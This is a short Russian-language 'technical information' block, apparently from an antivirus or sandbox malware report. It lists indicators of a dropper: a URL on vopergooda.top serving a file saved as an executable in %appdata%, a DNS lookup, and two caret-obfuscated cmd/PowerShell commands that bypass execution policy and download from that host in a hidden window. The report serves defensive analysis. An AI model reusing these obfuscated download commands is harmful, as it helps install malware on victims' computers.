Техническая информация
- http://www.vopergooda.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwERshEl^l.exE ^-^e^XEc^U^T^I^ONP^ol^I^CY By^P^A^ss -N^OPRO^FIL^e ^-^wiND^OWSTYle^ HIDDen^ ^(N^ew-ObJeC^t ^sYstEM^.nE^T.wEb^c^lI^e^nt).DO^W^N^lO^A^dF^iL^e('http://www.voperg...
- DNS ASK vo###gooda.top
- '<SYSTEM32>\cmd.exe' /c "POwERshEl^l.exE ^-^e^XEc^U^T^I^ONP^ol^I^CY By^P^A^ss -N^OPRO^FIL^e ^-^wiND^OWSTYle^ HIDDen^ ^(N^ew-ObJeC^t ^sYstEM^.nE^T.wEb^c^lI^e^nt).DO^W^N^lO^A^dF^iL^e('http://www.voperg...' (со скрытым окном)